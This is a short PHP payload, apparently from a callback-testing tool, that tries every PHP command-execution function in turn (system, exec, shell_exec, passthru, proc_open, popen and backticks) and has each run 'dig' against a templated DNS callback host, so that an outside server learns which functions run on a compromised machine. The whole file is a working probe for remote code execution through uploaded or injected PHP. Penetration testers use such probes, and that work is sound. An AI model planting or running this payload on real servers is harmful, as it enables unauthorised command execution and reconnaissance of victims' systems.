<?php
if(function_exists('system'))
system("dig system.[[rtn-dns]]");
if(function_exists('exec'))
exec("dig exec.[[rtn-dns]]");
if(function_exists('shell_exec'))
shell_exec("dig shellexec.[[rtn-dns]]");
if(function_exists('passthru'))
passthru("dig passthru.[[rtn-dns]]");
if(function_exists('proc_open'))
proc_open("dig procopen.[[rtn-dns]]");
if(function_exists('popen'))
popen("dig popen.[[rtn-dns]]");
$backtick = `dig backtick.[[rtn-dns]]`;
?>
Must be logged in to change this ID's contents